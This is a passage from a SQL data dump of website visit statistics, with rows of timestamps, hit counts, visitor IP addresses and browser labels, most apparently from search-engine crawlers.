0,0,'95.108.213.34','other'),(126948,1498687274,1,1,0,0,'95.108.213.7','other'),(126949,1498687336,2,2,0,0,'141.8.142.164','other'),(126950,1498687469,1,1,0,0,'164.132.161.7','other'),(126951,1498687611,1,1,0,0,'5.255.253.63','other'),(126952,1498687810,1,1,0,0,'141.8.142.49','other'),(126953,1498687812,1,1,0,0,'87.250.224.18','other'),(126954,1498687843,1,1,0,0,'157.55.39.239','other'),(126955,1498687949,1,1,0,0,'37.9.113.38','other'),(126956,1498688048,1,1,0,0,'5.255.253.70','other'),(126957,1498688202,1,1,0,0,'141.8.183.1','other'),(126958,1498688389,2,2,0,0,'178.154.189.21','other'),(126959,1498688780,1,1,0,0,'5.255.253.43','other'),(126960,1498688874,1,1,0,0,'87.250.224.7','other'),(126961,1498688926,1,1,0,0,'217.182.132.85','other'),(126962,1498689030,1,1,0,0,'164.132.161.79','other'),(126963,1498689288,1,1,0,0,'40.77.167.33','other'),(126964,1498689511,2,2,0,0,'91.209.11.236','other'),(126965,1498689697,1,1,0,0,'93.158.152.60','other'),(126966,1498689913,1,1,0,0,'141.8.132.72','other'),(126967,1498689941,1,1,0,0,'178.154.149.3','other'),(126968,1498689943,1,1,0,0,'141.8.142.97','other'),(126969,1498690007,1,1,0,0,'151.80.27.118','other'),(126970,1498690115,1,1,0,0,'51.255.71.111','other'),(126971,1498690117,1,1,0,0,'137.74.207.108','other'),(126972,1498690120,1,1,0,0,'164.132.161.81','other'),(126973,1498690218,1,1,0,0,'66.249.76.131','chrome'),(126974,1498690221,1,1,0,0,'66.249.76.113','chrome'),(126975,1498690276,1,1,0,0,'217.182.132.32','other'),(126976,1498690312,1,1,0,0,'141.8.142.164','other'),(126977,1498690331,1,1,0,0,'95.108.213.34','other'),(126978,1498690697,1,1,0,0,'217.182.132.172','other'),(126979,1498690938,1,1,0,0,'51.255.65.52','other'),(126980,1498691179,1,0,1,0,'66.249.76.114',''),(126981,1498691202,1,0,1,0,'66.249.76.112',''),(126982,1498691262,1,1,0,0,'66.249.76.137','chrome'),(126983,1498691308,1,0,1,0,'66.249.76.113',''),(126984,1498691315,1,1,0,0,'157.55.39.125','other'),(126985,1498691422,1,0,1,0,'66.249.76.131',''),(126986,1498691525,1,0,1,0,'66.249.66.75',''),(126987,1498691543,1,1,0,0,'217.182.132.68','other'),(126988,1498691942,1,1,0,0,'141.8.142.164','other'),(126989,1498691957,1,1,0,0,'46.188.106.212','msie'),(126990,1498692241,1,1,0,0,'178.154.149.3','other'),(126991,1498692306,1,1,0,0,'164.132.161.93','other'),(126992,1498692813,1,1,0,0,'217.182.132.96','other'),(126993,1498693110,1,1,0,0,'217.182.132.152','other'),(126994,1498693190,1,0,1,0,'66.249.76.137',''),(126995,1498693289,1,1,0,0,'51.255.65.36','other'),(126996,1498693310,1,1,0,0,'91.209.11.236','other'),(126997,1498693374,1,1,0,0,'217.182.132.33','other'),(126998,1498694262,1,1,0,0,'217.182.132.241','other'),(126999,1498694272,2,2,0,0,'91.209.11.236','other'),(127000,1498694588,1,1,0,0,'51.255.65.22','other'),(127001,1498694835,1,1,0,0,'87.250.224.18','other'),(127002,1498694880,1,1,0,0,'51.255.65.83','other'),(127003,1498695041,1,1,0,0,'137.74.207.170','other'),(127004,1498695403,1,1,0,0,'157.55.39.125','other'),(127005,1498695911,1,1,0,0,'164.132.162.160','other'),(127006,1498696004,1,1,0,0,'217.182.132.29','other'),(127007,1498696048,1,1,0,0,'94.180.137.214','msie'),(127008,1498696085,2,2,0,0,'91.209.11.236','other'),(127009,1498696612,1,1,0,0,'37.204.66.49','msie'),(127010,1498696884,1,0,1,0,'66.249.76.131',''),(127011,1498696932,1,1,0,0,'51.255.71.101','other'),(127012,1498696987,1,0,1,0,'66.249.66.157',''),(127013,1498697170,1,0,1,0,'66.249.66.155',''),(127014,1498697262,1,1,0,0,'51.255.65.65','other'),(127015,1498697348,1,0,1,0,'66.249.66.75',''),(127016,1498697545,1,1,0,0,'5.228.35.210','msie'),(127017,1498697632,1,1,0,0,'8.29.198.27','other'),(127018,1498697990,1,1,0,0,'176.193.114.243','msie'),(127019,1498698042,1,1,0,0,'91.209.11.236','other'),(127020,1498698144,1,1,0,0,'164.132.161.59','other'),(127021,1498698251,1,1,0,0,'51.255.65.31','other'),(127022,1498698374,1,1,0,0,'217.182.132.25','other'),(127023,1498699058,2,2,0,0,'91.209.11.236','other'),(127024,1498699269,1,1,0,0,'164.132.161.64','other'),(127025,1498699312,1,1,0,0,'157.55.39.239','other'),(127026,1498699494,1,1,0,0,'217.182.132.191','other'),(127027,1498699536,1,1,0,0,'51.255.65.43','other'),(127028,1498699671,1,1,0,0,'51.255.65.61','other'),(127029,1498700058,1,1,0,0,'217.182.132.66','other'),(127030,1498700132,1,1,0,0,'51.255.71.132','other'),(127031,1498700260,1,1,0,0,'66.249.66.156','chrome'),(127032,1498700339,1,1,0,0,'157.55.39.125','other'),(127033,1498700597,1,1,0,0,'51.255.65.9','other'),(127034,1498700676,1,1,0,0,'217.182.132.187','other'),(127035,1498700692,1,0,1,0,'66.249.66.76',''),(127036,1498700983,1,1,0,0,'51.255.65.20','other'),(127037,1498702242,1,1,0,0,'217.182.132.157','other'),(127038,1498702387,1,1,0,0,'217.182.132.92','other'),(127039,1498702683,1,1,0,0,'164.132.161.70','other'),(127040,1498702945,1,1,0,0,'217.182.132.54','other'),(127041,1498703145,1,1,0,0,'164.132.161.57','other'),(127042,1498703211,1,1,0,0,'188.32.176.228','msie'),(127043,1498703494,1,1,0,0,'51.255.65.11','other'),(127044,1498703656,1,0,1,0,'66.249.66.74',''),(127045,1498703722,1,0,1,0,'66.249.76.137',''),(127046,1498703973,1,1,0,0,'51.255.65.23','other'),(127047,1498704046,1,1,0,0,'217.182.132.192','other'),(127048,1498704057,1,1,0,0,'180.76.15.162','other'),(127049,1498704142,1,1,0,0,'82.145.221.217','other'),(127050,1498704208,1,1,0,0,'37.112.226.53','msie'),(127051,1498704408,1,1,0,0,'51.255.71.113','other'),(127052,1498704422,1,1,0,0,'51.255.65.81','other'),(127053,1498704498,1,1,0,0,'46.188.106.212','msie'),(127054,1498704583,2,2,0,0,'91.209.11.236','other'),(127055,1498704620,1,1,0,0,'87.250.224.8','other'),(127056,1498704730,1,0,1,0,'66.249.66.157',''),(127057,1498704811,1,1,0,0,'51.255.65.24','other'),(127058,1498704855,1,1,0,0,'37.147.102.18','msie'),(127059,1498705009,1,1,0,0,'95.220.201.167','msie'),(127060,1498705221,1,1,0,0,'51.255.65.2','other'),(127061,1498705611,2,2,0,0,'95.108.213.34','other'),(127062,1498705637,1,1,0,0,'37.147.226.75','chrome'),(127063,1498705638,1,1,0,0,'5.165.250.18','chrome'),(127064,1498705677,1,1,0,0,'217.182.132.85','other'),(127065,1498705680,1,1,0,0,'141.8.132.43','other'),(127066,1498705751,5,5,0,0,'95.108.179.15','other'),(127067,1498705773,2,2,0,0,'87.250.224.7','other'),(127068,1498705817,1,1,0,0,'178.154.200.37','other'),(127069,1498705847,3,3,0,0,'141.8.142.154','other'),(127070,1498705873,4,4,0,0,'87.250.224.18','other'),(127071,1498705890,4,4,0,0,'141.8.142.164','other'),(127072,1498705945,1,1,0,0,'95.108.181.13','other'),(127073,1498706126,1,1,0,0,'5.255.253.58','other'),(127074,1498706129,1,1,0,0,'95.108.213.7','other'),(127075,1498706442,1,1,0,0,'40.77.167.95','other'),(127076,1498706521,1,1,0,0,'95.108.213.34','other'),(127077,1498706940,1,1,0,0,'5.255.253.81','other'),(127078,1498707181,1,1,0,0,'164.132.161.34','other'),(127079,1498707214,1,1,0,0,'216.244.66.237','other'),(127080,1498707233,1,1,0,0,'217.182.132.54','other'),(127081,1498707250,1,1,0,0,'178.154.200.37','other'),(127082,1498707329,1,1,0,0,'51.255.65.6','other'),(127083,1498707537,1,0,1,0,'66.249.76.131',''),(127084,1498707538,1,1,0,0,'217.182.132.37','other'),(127085,1498707725,2,2,0,0,'87.250.224.7','other'),(127086,1498707824,2,2,0,0,'95.108.213.34','other'),(127087,1498708044,1,1,0,0,'141.8.142.42','other'),(127088,1498708108,1,1,0,0,'137.74.201.99','other'),(127089,1498708240,1,1,0,0,'66.249.66.76','chrome'),(127090,1498708252,2,2,0,0,'173.208.157.186','other'),(127091,1498708460,1,1,0,0,'8.29.198.25','other'),(127092,1498708497,1,0,1,0,'66.249.76.131',''),(127093,1498708893,1,1,0,0,'141.8.142.154','other'),(127094,1498709063,1,1,0,0,'5.255.253.28','other'),(127095,1498709318,1,1,0,0,'141.8.142.42','other'),(127096,1498709437,1,0,1,0,'66.249.76.131',''),(127097,1498709555,1,1,0,0,'51.255.65.4','other'),(127098,1498709665,1,0,1,0,'66.249.76.137',''),(127099,1498709740,1,1,0,0,'5.255.253.63','other'),(127100,1498709773,1,1,0,0,'164.132.161.70','other'),(127101,1498709855,1,1,0,0,'5.255.253.81','other'),(127102,1498709900,1,0,1,0,'66.249.76.113',''),(127103,1498709960,1,0,1,0,'66.249.76.112',''),(127104,1498710174,1,1,0,0,'51.255.65.60','other'),(127105,1498710234,1,1,0,0,'216.244.66.237','other'),(127106,1498710403,1,1,0,0,'51.255.71.110','other'),(127107,1498710709,1,1,0,0,'164.132.161.42','other'),(127108,1498710762,1,1,0,0,'188.32.176.228','msie'),(127109,1498710933,1,1,0,0,'95.108.179.15','other'),(127110,1498711005,1,1,0,0,'217.182.132.52','other'),(127111,1498711205,1,1,0,0,'217.182.132.50','other'),(127112,1498711224,1,1,0,0,'217.182.132.4','other'),(127113,1498711264,1,0,1,0,'66.249.76.131',''),(127114,1498711403,1,1,0,0,'37.204.66.49','msie'),(127115,1498711510,1,1,0,0,'40.77.167.95','other'),(127116,1498711605,1,1,0,0,'91.196.178.67','firefox'),(127117,1498711696,1,1,0,0,'51.255.65.42','other'),(127118,1498711777,1,1,0,0,'217.182.132.87','other'),(127119,1498711890,1,1,0,0,'51.255.71.119','other'),(127120,1498711978,1,1,0,0,'51.255.71.115','other'),(127121,1498711998,1,0,1,0,'66.249.66.156',''),(127122,1498712174,1,1,0,0,'164.132.164.180','other'),(127123,1498712391,1,1,0,0,'51.255.65.37','other'),(127124,1498712422,1,1,0,0,'91.209.11.236','other'),(127125,1498712463,1,1,0,0,'37.204.152.178','msie'),(127126,1498712489,1,1,0,0,'51.255.65.4','other'),(127127,1498712554,1,1,0,0,'51.255.71.130','other'),(127128,1498712680,1,1,0,0,'66.102.9.153','chrome'),(127129,1498712686,1,1,0,0,'176.193.114.243','msie'),(127130,1498713122,1,1,0,0,'164.132.161.52','other'),(127131,1498713235,1,1,0,0,'91.196.178.69','firefox'),(127132,1498713543,1,1,0,0,'216.244.66.237','other'),(127133,1498713544,1,0,1,0,'66.249.66.76',''),(127134,1498713805,1,0,1,0,'66.249.66.157',''),(127135,1498714149,1,1,0,0,'51.255.71.125','other'),(127136,1498714209,1,1,0,0,'217.182.132.32','other'),(127137,1498714307,1,1,0,0,'91.196.178.36','firefox'),(127138,1498714327,1,0,1,0,'66.249.76.113',''),(127139,1498714481,1,1,0,0,'164.132.161.86','other'),(127140,1498714558,1,1,0,0,'164.132.161.9','other'),(127141,1498714710,1,0,1,0,'66.249.76.137',''),(127142,1498714739,1,1,0,0,'51.255.65.87','other'),(127143,1498714760,1,1,0,0,'94.179.85.247','chrome'),(127144,1498714965,1,1,0,0,'40.77.167.33','other'),(127145,1498714970,1,1,0,0,'217.182.132.35','other'),(127146,1498714988,1,1,0,0,'109.173.25.162','msie'),(127147,1498715088,1,1,0,0,'51.255.71.121','other'),(127148,1498715352,1,1,0,0,'91.196.178.67','chrome'),(127149,1498715443,1,1,0,0,'164.132.161.16','other'),(127150,1498715671,1,1,0,0,'217.182.132.65','other'),(127151,1498715690,1,1,0,0,'51.255.65.64','other'),(127152,1498715697,1,0,1,0,'68.180.230.48',''),(127153,1498715747,1,1,0,0,'91.209.11.236','other'),(127154,1498715935,1,1,0,0,'91.196.178.69','firefox'),(127155,1498716207,1,0,1,0,'66.249.76.112',''),(127156,1498716528,1,1,0,0,'164.132.161.92','other'),(127157,1498716746,1,1,0,0,'66.249.76.113','chrome'),(127158,1498716750,1,1,0,0,'66.249.76.131','chrome'),(127159,1498717012,1,1,0,0,'51.255.65.44','other'),(127160,1498717153,1,1,0,0,'66.249.66.157','chrome'),(127161,1498717180,1,1,0,0,'66.249.76.114','chrome'),(127162,1498717239,1,1,0,0,'217.182.132.191','other'),(127163,1498717536,1,1,0,0,'91.196.177.15','chrome'),(127164,1498718239,1,1,0,0,'51.255.71.122','other'),(127165,1498718422,1,1,0,0,'37.204.66.49','msie'),(127166,1498718599,1,1,0,0,'91.124.4.62','chrome'),(127167,1498718686,1,1,0,0,'94.180.137.214','msie'),(127168,1498718750,1,1,0,0,'92.112.109.230','chrome'),(127169,1498718842,1,1,0,0,'51.255.65.8','other'),(127170,1498718963,2,2,0,0,'46.4.91.109','other'),(127171,1498718967,1,1,0,0,'217.182.132.176','other'),(127172,1498719051,1,1,0,0,'51.255.71.111','other'),(127173,1498719173,1,1,0,0,'5.228.35.210','msie'),(127174,1498719191,1,1,0,0,'164.132.161.78','other'),(127175,1498719274,1,1,0,0,'91.196.178.36','chrome'),(127176,1498719287,1,1,0,0,'8.29.198.27','other'),(127177,1498719393,1,1,0,0,'95.220.206.182','msie'),(127178,1498719804,1,1,0,0,'51.255.65.16','other'),(127179,1498719825,1,1,0,0,'141.8.132.39','other'),(127180,1498719961,1,1,0,0,'164.132.161.85','other'),(127181,1498720035,1,1,0,0,'164.132.161.35','other'),(127182,1498720770,1,1,0,0,'137.74.207.120','other'),(127183,1498720929,2,2,0,0,'178.154.200.37','other'),(127184,1498720930,1,1,0,0,'95.108.179.15','other'),(127185,1498720974,1,1,0,0,'95.132.41.250','firefox'),(127186,1498721013,1,1,0,0,'141.8.142.164','other'),(127187,1498721016,1,1,0,0,'87.250.224.18','other'),(127188,1498721021,2,2,0,0,'141.8.142.38','other'),(127189,1498721024,1,1,0,0,'5.255.253.58','other'),(127190,1498721027,2,2,0,0,'5.255.253.81','other'),(127191,1498721030,1,1,0,0,'95.108.213.8','other'),(127192,1498721035,1,1,0,0,'141.8.142.97','other'),(127193,1498721037,1,1,0,0,'141.8.132.25','other'),(127194,1498721040,1,1,0,0,'178.154.189.3','other'),(127195,1498721043,1,1,0,0,'95.108.213.34','other'),(127196,1498721065,1,1,0,0,'37.55.151.175','chrome'),(127197,1498721258,1,1,0,0,'164.132.161.57','other'),(127198,1498721312,1,1,0,0,'212.1.109.166','chrome'),(127199,1498721433,1,1,0,0,'51.255.65.66','other'),(127200,1498721743,1,0,1,0,'66.249.66.74',''),(127201,1498722017,1,1,0,0,'92.112.109.230','chrome'),(127202,1498722162,1,1,0,0,'178.154.200.2','other'),(127203,1498722164,1,1,0,0,'178.154.149.3','other'),(127204,1498722220,1,1,0,0,'91.195.3.115','chrome'),(127205,1498722896,1,1,0,0,'95.108.179.15','other'),(127206,1498723195,1,1,0,0,'195.34.205.210','chrome'),(127207,1498723290,1,1,0,0,'95.132.16.114','chrome'),(127208,1498723306,1,1,0,0,'217.182.132.156','other'),(127209,1498723628,1,1,0,0,'141.8.142.154','other'),(127210,1498723811,1,1,0,0,'51.255.65.89','other'),(127211,1498723873,1,1,0,0,'91.196.178.136','firefox'),(127212,1498723894,1,1,0,0,'162.210.196.130','other'),(127213,1498724046,1,1,0,0,'51.255.65.6','other'),(127214,1498724080,1,1,0,0,'178.95.247.243','firefox'),(127215,1498724134,1,1,0,0,'91.196.178.71','chrome'),(127216,1498724359,2,2,0,0,'95.108.213.34','other'),(127217,1498724393,1,1,0,0,'217.182.132.95','other'),(127218,1498724739,1,0,1,0,'66.249.76.112',''),(127219,1498725086,1,1,0,0,'217.182.132.68','other'),(127220,1498725253,1,1,0,0,'51.255.65.46','other'),(127221,1498725296,1,1,0,0,'51.255.65.51','other'),(127222,1498725416,1,0,1,0,'66.249.76.131',''),(127223,1498725426,1,1,0,0,'51.255.65.78','other'),(127224,1498725475,1,1,0,0,'66.249.66.75','chrome'),(127225,1498725500,1,1,0,0,'66.249.76.112','chrome'),(127226,1498725504,1,1,0,0,'66.249.66.156','chrome'),(127227,1498725555,1,1,0,0,'151.80.27.116','other'),(127228,1498725597,1,1,0,0,'217.182.132.67','other'),(127229,1498725736,1,1,0,0,'40.77.167.95','other'),(127230,1498726232,1,1,0,0,'51.255.65.15','other'),(127231,1498726520,1,1,0,0,'157.55.39.125','other'),(127232,1498726662,1,1,0,0,'178.95.247.174','chrome'),(127233,1498726935,1,1,0,0,'91.196.178.70','chrome'),(127234,1498727043,1,1,0,0,'51.255.65.46','other'),(127235,1498727063,1,1,0,0,'91.196.178.67','chrome'),(127236,1498727389,1,1,0,0,'217.182.132.75','other'),(127237,1498727438,1,1,0,0,'217.182.132.15','other'),(127238,1498727681,2,2,0,0,'69.30.213.82','other'),(127239,1498728243,1,1,0,0,'217.69.133.2','other'),(127240,1498728250,1,1,0,0,'51.255.65.94','other'),(127241,1498728740,1,1,0,0,'51.255.65.59','other'),(127242,1498729628,1,1,0,0,'91.196.178.66','firefox'),(127243,1498729765,1,1,0,0,'92.112.109.230','chrome'),(127244,1498729835,1,1,0,0,'91.196.179.138','firefox'),(127245,1498730118,1,1,0,0,'8.29.198.27','other'),(127246,1498730360,1,1,0,0,'91.196.178.169','chrome'),(127247,1498730394,1,1,0,0,'91.196.177.134','chrome'),(127248,1498731115,1,1,0,0,'164.132.162.188','other'),(127249,1498731413,1,1,0,0,'95.220.20.177','msie'),(127250,1498731742,1,1,0,0,'217.182.132.60','other'),(127251,1498731968,1,0,1,0,'66.249.66.156',''),(127252,1498731970,1,1,0,0,'109.173.60.201','other'),(127253,1498732303,1,1,0,0,'217.182.132.174','other'),(127254,1498732554,1,1,0,0,'164.132.161.66','other'),(127255,1498732763,1,1,0,0,'66.249.76.137','chrome'),(127256,1498732783,1,1,0,0,'66.249.76.113','chrome'),(127257,1498733058,1,1,0,0,'91.196.178.168','chrome'),(127258,1498733233,1,1,0,0,'217.182.132.150','other'),(127259,1498733318,1,1,0,0,'180.76.15.151','other'),(127260,1498733365,1,1,0,0,'51.255.65.96','other'),(127261,1498733579,1,1,0,0,'95.132.125.3','chrome'),(127262,1498733922,1,1,0,0,'66.249.66.156','chrome'),(127263,1498734174,1,1,0,0,'137.74.201.108','other'),(127264,1498734798,1,1,0,0,'66.249.76.131','chrome'),(127265,1498734964,1,1,0,0,'92.113.127.239','chrome'),(127266,1498735006,1,1,0,0,'66.249.76.137','chrome'),(127267,1498735260,1,1,0,0,'51.255.65.51','other'),(127268,1498735590,1,1,0,0,'91.196.178.70','firefox'),(127269,1498735747,1,1,0,0,'217.182.132.190','other'),(127270,1498735856,1,0,1,0,'66.249.66.155',''),(127271,1498736165,1,1,0,0,'51.255.65.40','other'),(127272,1498736337,1,1,0,0,'217.182.132.81','other'),(127273,1498736396,1,1,0,0,'164.132.161.30','other'),(127274,1498736954,1,1,0,0,'91.196.178.166','chrome'),(127275,1498737130,1,1,0,0,'217.182.132.178','other'),(127276,1498737177,1,1,0,0,'217.182.132.95','other'),(127277,1498737322,1,1,0,0,'217.182.132.171','other'),(127278,1498737386,1,1,0,0,'164.132.161.78','other'),(127279,1498737453,1,1,0,0,'178.95.247.243','firefox'),(127280,1498737772,1,0,1,0,'66.249.76.113',''),(127281,1498738737,1,1,0,0,'217.182.132.156','other'),(127282,1498739032,1,1,0,0,'31.41.67.209','chrome'),(127283,1498739252,1,1,0,0,'164.132.161.4','other'),(127284,1498739393,1,1,0,0,'217.182.132.65','other'),(127285,1498739423,1,1,0,0,'217.69.133.2','other'),(127286,1498740307,1,1,0,0,'137.74.207.102','other'),(127287,1498740309,1,1,0,0,'66.249.66.155','chrome'),(127288,1498740316,1,1,0,0,'66.249.76.114','chrome'),(127289,1498740948,1,1,0,0,'8.29.198.27','other'),(127290,1498741770,1,1,0,0,'91.196.178.65','firefox'),(127291,1498742296,2,2,0,0,'54.165.59.7','other'),(127292,1498742325,1,1,0,0,'178.95.247.243','firefox'),(127293,1498742467,1,1,0,0,'91.196.177.46','chrome'),(127294,1498742614,1,1,0,0,'51.255.65.24','other'),(127295,1498742680,1,0,1,0,'66.249.76.131',''),(127296,1498742702,1,1,0,0,'91.196.178.69','firefox'),(127297,1498743230,4,4,0,0,'54.165.59.7','other'),(127298,1498743277,1,1,0,0,'51.255.65.46','other'),(127299,1498743591,1,1,0,0,'91.224.68.236','chrome'),(127300,1498743615,1,1,0,0,'164.132.161.81','other'),(127301,1498743697,1,1,0,0,'51.255.65.2','other'),(127302,1498743997,1,1,0,0,'51.255.65.13','other'),(127303,1498744055,1,0,1,0,'66.249.76.137',''),(127304,1498744198,1,1,0,0,'217.182.132.30','other'),(127305,1498744203,2,2,0,0,'54.165.59.7','other'),(127306,1498744297,1,1,0,0,'217.182.132.63','other'),(127307,1498744306,1,1,0,0,'51.255.65.17','other'),(127308,1498745076,1,1,0,0,'164.132.161.90','other'),(127309,1498745174,1,1,0,0,'217.182.132.240','other'),(127310,1498745191,1,1,0,0,'185.19.246.11','chrome'),(127311,1498745220,2,2,0,0,'91.197.185.234','firefox'),(127312,1498745242,1,1,0,0,'51.255.71.126','other'),(127313,1498745276,1,1,0,0,'217.182.132.7','other'),(127314,1498745582,1,1,0,0,'141.8.183.1','other'),(127315,1498745879,1,1,0,0,'51.255.65.36','other'),(127316,1498746423,6,6,0,0,'54.165.59.7','other'),(127317,1498746731,1,1,0,0,'141.8.132.72','other'),(127318,1498746919,2,2,0,0,'95.108.179.15','other'),(127319,1498747094,1,1,0,0,'5.255.253.63','other'),(127320,1498747230,4,4,0,0,'141.8.142.164','other'),(127321,1498747403,1,1,0,0,'66.249.66.157','chrome'),(127322,1498747410,1,1,0,0,'66.249.66.76','chrome'),(127323,1498747674,1,1,0,0,'164.132.161.23','other'),(127324,1498747697,1,1,0,0,'51.255.71.119','other'),(127325,1498747811,1,1,0,0,'87.250.224.7','other'),(127326,1498747815,1,1,0,0,'217.182.132.25','other'),(127327,1498748003,2,2,0,0,'95.108.213.34','other'),(127328,1498748229,1,1,0,0,'141.8.142.154','other'),(127329,1498748514,2,2,0,0,'95.108.179.15','other'),(127330,1498748616,1,1,0,0,'141.8.142.97','other'),(127331,1498748966,2,2,0,0,'5.255.253.63','other'),(127332,1498749043,1,1,0,0,'141.8.142.164','other'),(127333,1498749249,1,1,0,0,'87.250.224.18','other'),(127334,1498749274,1,1,0,0,'93.158.152.79','other'),(127335,1498749530,2,2,0,0,'141.8.142.154','other'),(127336,1498749666,1,1,0,0,'51.255.65.21','other'),(127337,1498749878,1,1,0,0,'141.8.142.97','other'),(127338,1498749886,2,2,0,0,'5.255.253.58','other'),(127339,1498749893,3,3,0,0,'178.154.200.45','other'),(127340,1498749971,1,1,0,0,'95.24.112.214','chrome'),(127341,1498749984,1,0,1,0,'66.249.66.76',''),(127342,1498750093,1,1,0,0,'137.74.207.170','other'),(127343,1498750290,1,1,0,0,'178.154.189.3','other'),(127344,1498750309,2,2,0,0,'87.250.224.18','other'),(127345,1498750352,1,1,0,0,'51.255.71.130','other'),(127346,1498750368,1,1,0,0,'95.108.213.7','other'),(127347,1498750502,1,1,0,0,'95.108.213.34','other'),(127348,1498750518,2,2,0,0,'141.8.132.39','other'),(127349,1498750611,2,2,0,0,'141.8.142.164','other'),(127350,1498750628,1,1,0,0,'5.255.253.81','other'),(127351,1498750637,1,1,0,0,'217.182.132.61','other'),(127352,1498750641,1,1,0,0,'217.182.132.35','other'),(127353,1498750698,1,1,0,0,'87.250.224.7','other'),(127354,1498750786,1,0,1,0,'66.249.76.112',''),(127355,1498750892,3,3,0,0,'5.255.253.63','other'),(127356,1498751047,1,1,0,0,'88.198.54.49','other'),(127357,1498751310,2,2,0,0,'95.108.213.7','other'),(127358,1498751324,1,0,1,0,'66.249.66.76',''),(127359,1498751480,1,1,0,0,'164.132.161.27','other'),(127360,1498751568,1,1,0,0,'141.8.142.38','other'),(127361,1498751726,4,4,0,0,'95.108.213.34','other'),(127362,1498751765,5,5,0,0,'95.108.179.15','other'),(127363,1498751780,1,1,0,0,'8.29.198.25','other'),(127364,1498752050,3,3,0,0,'141.8.142.164','other'),(127365,1498752123,1,1,0,0,'51.255.65.71','other'),(127366,1498752170,1,1,0,0,'164.132.161.33','other'),(127367,1498752305,1,1,0,0,'164.132.162.156','other'),(127368,1498752393,1,1,0,0,'5.255.253.63','other'),(127369,1498752423,2,2,0,0,'141.8.142.154','other'),(127370,1498752523,1,1,0,0,'137.74.207.108','other'),(127371,1498752544,1,1,0,0,'66.249.76.112','chrome'),(127372,1498752725,6,6,0,0,'95.108.179.15','other'),(127373,1498752814,3,3,0,0,'95.108.213.34','other'),(127374,1498752894,2,1,1,0,'66.249.66.75',''),(127375,1498752928,2,2,0,0,'91.209.11.236','other'),(127376,1498753030,2,2,0,0,'95.108.213.7','other'),(127377,1498753462,1,1,0,0,'141.8.142.164','other'),(127378,1498753662,2,2,0,0,'95.108.179.15','other'),(127379,1498753785,1,1,0,0,'51.255.65.52','other'),(127380,1498753817,1,1,0,0,'37.53.110.56','chrome'),(127381,1498753864,1,1,0,0,'91.209.11.236','other'),(127382,1498753865,1,1,0,0,'164.132.161.43','other'),(127383,1498753963,1,1,0,0,'217.182.132.149','other'),(127384,1498754155,1,1,0,0,'141.8.132.25','other'),(127385,1498754267,1,1,0,0,'51.255.65.41','other'),(127386,1498754354,1,1,0,0,'51.255.65.40','other'),(127387,1498754941,1,1,0,0,'51.255.65.16','other'),(127388,1498755118,1,1,0,0,'164.132.161.65','other'),(127389,1498755610,1,1,0,0,'164.132.161.97','other'),(127390,1498755695,1,1,0,0,'109.63.183.111','chrome'),(127391,1498755718,1,1,0,0,'217.182.132.68','other'),(127392,1498756030,1,1,0,0,'164.132.161.78','other'),(127393,1498756432,16,16,0,0,'154.16.138.75','other'),(127394,1498756571,1,1,0,0,'164.132.161.22','other'),(127395,1498756999,1,1,0,0,'51.255.65.56','other'),(127396,1498757655,1,1,0,0,'137.74.201.99','other'),(127397,1498757691,1,1,0,0,'164.132.161.69','other'),(127398,1498758339,1,0,1,0,'66.249.76.131',''),(127399,1498759212,1,1,0,0,'51.255.65.62','other'),(127400,1498759354,1,1,0,0,'151.80.27.116','other'),(127401,1498759608,1,1,0,0,'66.249.76.112','chrome'),(127402,1498759876,1,1,0,0,'217.182.132.176','other'),(127403,1498759889,1,1,0,0,'91.196.178.167','chrome'),(127404,1498759959,1,1,0,0,'5.9.138.93','firefox'),(127405,1498760068,1,1,0,0,'66.249.66.156','chrome'),(127406,1498760164,1,1,0,0,'217.182.132.177','other'),(127407,1498760251,1,1,0,0,'217.182.132.193','other'),(127408,1498760353,1,1,0,0,'217.182.132.19','other'),(127409,1498760699,1,1,0,0,'217.182.132.65','other'),(127410,1498760858,1,1,0,0,'137.74.207.170','other'),(127411,1498760934,1,1,0,0,'164.132.161.14','other'),(127412,1498760939,1,1,0,0,'93.158.152.107','other'),(127413,1498761041,1,0,1,0,'68.180.230.48',''),(127414,1498761195,1,1,0,0,'51.255.65.43','other'),(127415,1498761798,1,1,0,0,'164.132.161.46','other'),(127416,1498761807,1,1,0,0,'164.132.161.36','other'),(127417,1498761848,1,1,0,0,'51.255.65.64','other'),(127418,1498761891,1,1,0,0,'217.182.132.66','other'),(127419,1498762607,1,1,0,0,'8.29.198.25','other'),(127420,1498763132,1,1,0,0,'164.132.161.30','other'),(127421,1498763356,1,1,0,0,'51.255.65.74','other'),(127422,1498763418,1,1,0,0,'40.77.167.33','other'),(127423,1498763512,1,0,1,0,'68.180.230.48',''),(127424,1498763741,1,1,0,0,'51.255.65.58','other'),(127425,1498763863,1,0,1,0,'66.249.76.114',''),(127426,1498763886,1,0,1,0,'66.249.76.112',''),(127427,1498764678,1,1,0,0,'217.182.132.152','other'),(127428,1498765663,1,1,0,0,'91.196.178.131','chrome'),(127429,1498765758,1,1,0,0,'217.182.132.63','other'),(127430,1498765995,1,0,1,0,'66.249.76.131',''),(127431,1498766184,1,1,0,0,'51.255.71.121','other'),(127432,1498766253,1,1,0,0,'217.182.132.83','other'),(127433,1498766527,1,1,0,0,'95.108.179.15','other'),(127434,1498766529,1,1,0,0,'141.8.142.164','other'),(127435,1498766547,1,1,0,0,'217.182.132.90','other'),(127436,1498766738,1,1,0,0,'217.182.132.15','other'),(127437,1498766755,1,1,0,0,'164.132.161.42','other'),(127438,1498766915,2,2,0,0,'91.209.11.236','other'),(127439,1498767241,1,0,1,0,'66.249.66.74',''),(127440,1498767506,1,1,0,0,'66.249.76.113','chrome'),(127441,1498767820,1,1,0,0,'164.132.161.50','other'),(127442,1498767969,1,1,0,0,'217.182.132.67','other'),(127443,1498768248,1,1,0,0,'217.182.132.85','other'),(127444,1498768401,1,1,0,0,'40.77.167.33','other'),(127445,1498768492,1,0,1,0,'66.249.66.157',''),(127446,1498768581,1,1,0,0,'51.255.71.115','other'),(127447,1498768673,1,1,0,0,'51.255.65.37','other'),(127448,1498769128,1,1,0,0,'137.74.207.170','other'),(127449,1498769256,1,1,0,0,'164.132.161.83','other'),(127450,1498769337,1,1,0,0,'164.132.161.3','other'),(127451,1498769518,1,1,0,0,'51.255.65.81','other'),(127452,1498769688,1,0,1,0,'66.249.76.131',''),(127453,1498769913,1,1,0,0,'51.255.65.54','other'),(127454,1498769955,1,1,0,0,'217.182.132.241','other'),(127455,1498769961,1,1,0,0,'164.132.162.187','other'),(127456,1498769989,1,1,0,0,'188.32.42.109','msie'),(127457,1498769993,1,1,0,0,'91.209.11.236','other'),(127458,1498770275,1,1,0,0,'51.255.65.21','other'),(127459,1498770313,1,1,0,0,'164.132.161.56','other'),(127460,1498771174,1,1